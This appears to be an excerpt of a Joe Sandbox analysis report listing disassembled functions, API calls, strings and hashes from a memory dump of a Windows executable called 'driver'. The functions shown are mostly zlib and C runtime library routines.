invalid distances set, xrefs: 00007FF6A29BB210
invalid bit length repeat, xrefs: 00007FF6A29BB109
invalid code lengths set, xrefs: 00007FF6A29BAE9D
invalid distance code, xrefs: 00007FF6A29BB624
invalid literal/lengths set, xrefs: 00007FF6A29BB1A3
invalid literal/length code, xrefs: 00007FF6A29BB452
too many length or distance symbols, xrefs: 00007FF6A29BAEB6
invalid distance too far back, xrefs: 00007FF6A29BB6E0
invalid code -- missing end-of-block, xrefs: 00007FF6A29BB136

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: ad71ebbf7d81f588d31c0c74a26175563730e562211960cadb02f5afc1033226
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 53521872A156A68BD7988F16C458BBD3BAAFB44744F014139EA4AC37C2DFBCD844DB40

Function 00007FF6A29BD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6A29BD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF6A29BD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6A29BD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6A29BD240
IsDebuggerPresent.KERNEL32 ref: 00007FF6A29BD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29BD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29BD2BC

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 0e530bf6ec4a31556f756fb59efd52d43437f2bc56a48447978c2b5b462c6272
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: B9319672609B8185EB608F61E8503EE33A1FB94B48F044039DB4D87B9ADF7CC548D710

Function 00007FF6A29D5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6A29D5CB5

Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C

Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

Part of subcall function 00007FF6A29CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA979
Part of subcall function 00007FF6A29CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA99E

_get_daylight.LIBCMT ref: 00007FF6A29D5CA4

Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C

_get_daylight.LIBCMT ref: 00007FF6A29D5F1A
_get_daylight.LIBCMT ref: 00007FF6A29D5F2B
_get_daylight.LIBCMT ref: 00007FF6A29D5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: c1092af912ab9c195aa3b9abc9fd48a7821443738fc25ae78f96f1c787582ad8
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 5BD1C126A4A24246FB24AF37D4811B96791EF84F9CF808136EA4DC7697DFBCE441B740

Function 00007FF6A29CA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6A29CA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6A29CA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF6A29CA750
IsDebuggerPresent.KERNEL32 ref: 00007FF6A29CA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29CA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29CA79E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 5bc0d29506105087d2c8a1f49be6f8983aebef5fb94696d37093237eca1eef7f
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: C0319632649B8185E724CF25E8503EE73A0FB98B58F540135EA8D87B56DF7CD145D700

Function 00007FF6A29D18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D1930
FindFirstFileExW.KERNEL32 ref: 00007FF6A29D1A3A

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 91e68470de462d66c865fd2ba66edf8e9a75287a0fcb9acb5776d5c6d4e0bee3
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 70B1B423B5A68245EB649B67E5001B963D1EB44FE8F444136EA5D87BCAEFBCE441F300

Function 00007FF6A29D5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6A29D5F1A

Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C

_get_daylight.LIBCMT ref: 00007FF6A29D5F2B

Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C

_get_daylight.LIBCMT ref: 00007FF6A29D5F3C

Part of subcall function 00007FF6A29D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D564C

Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: b4a91b8df81e8fe54c1de5d1cb109bd6afdbb190dae51a66343283e5ab6a6e99
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: CE516532A4A68286E754DF27E4815A96790FF48F8CF844135EA4DC7697DFBCE440A740

Function 00007FF6A29BD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6A29BD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF6A29BD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6A29BD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6A29BD0D6

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: ca73135a5ee42049fd0ae0ae2ebb798455ef37b71fe5550840e41bc44283277c
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: AF114836B59B068AFB00CB61E8542B933A4FB19B58F040E35DA6D867A9DFB8D1549340

Function 00007FF6A29D3C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6A29D3CE6
memcpy_s.LIBCPMT ref: 00007FF6A29D3D11

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 4624c86a48313232cb82b20e832f45c0cd5b3e56fedf31ffeebb173713e5648b
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 52C1F472B5A28687E7248F1AE14466AB7E5F794B88F449134DF4E83785DF7DE800EB00

Function 00007FF6A29BA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF6A29BA991
unknown header flags set, xrefs: 00007FF6A29BA535
, xrefs: 00007FF6A29BA5CB

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: 46c6b233ea0f81aa6e0dd8900ad46233c426b50337ff9865065e912f693984d3
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 20F1A472A5A3D58BE7998F16C088B7E3AA9FF44B48F054138DA4987793CFB8D540E740

Function 00007FF6A29D9798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6A29D99E7
RaiseException.KERNEL32 ref: 00007FF6A29D99F8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 5f07aa5c68737927eda3d91292ce64ca3a23ebcca66c7efb05ba1ec5b1c56e8a
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 71B16973A05B898AEB15DF2AC9463683BE0F788F4CF148821DA5D837A5DF79D451E700

Function 00007FF6A29C3A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6A29C3DC4
, xrefs: 00007FF6A29C3B82

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: 10e81f65412716c0d3343945e06081235f0dd0ae993e2b3c21ec30791fb7a4e9
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: EAE1C732A8A6428AEB689E27C05013E3368FF45F4CF145135DE4E87696DFA9F851E708

Function 00007FF6A29BA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF6A29BA4CB
invalid window size, xrefs: 00007FF6A29BA4B2

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 89ced009f36fccd33b97581d31e259f83eaca16e77b012a8594166eb77295907
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: 2D91B772A592C687E7A88E16C498B7E3AA9FB44758F114139DA4A867C3CF7CE540DB00

Function 00007FF6A29CDF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6A29CE0EA
e+000, xrefs: 00007FF6A29CE06D

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: c7594df3419321780a72f7eaf778cb4df412f548a9708b3eea15a268866b16a9
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: DC514662B1D6C58AE724CE3699007696B91E744FA8F489231CB9987AC7CFBDE4409700

Function 00007FF6A29CDACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6A29CDE0E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 1e46c08a905b629ead08dd0a067f721893ff7a115122237a36bb9b76c6deea0b
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 92A16763A4A7C54AEB21CF26A0007A97B90EB65F88F048031DE8D87786DEBDF511E310

Function 00007FF6A29C8804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6A29C8823

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: 6aec737de14f380c8336e078b9cec50b5cec6382fc510c687196ad41d672c871
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: EE51B011F8E74259FAAAAA2799051BA52907F85FCCF484034DE1DC7BD7EEBCF4016202

Function 00007FF6A29D34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6A29D34F4

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: e2b43da1c4e33ce2db73fff8ba90b322b6d3c8da93e351f9abe412e6f5e5ddce
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 91B09220E47A82C2FA482B226C8221922A97F58B04F980138C11C80331DE6C20E57700

Function 00007FF6A29C3610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: 23d8ab15b3f57486ed6a3cf3c63eb39372bec8fac38080aad891f664db7394e5
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
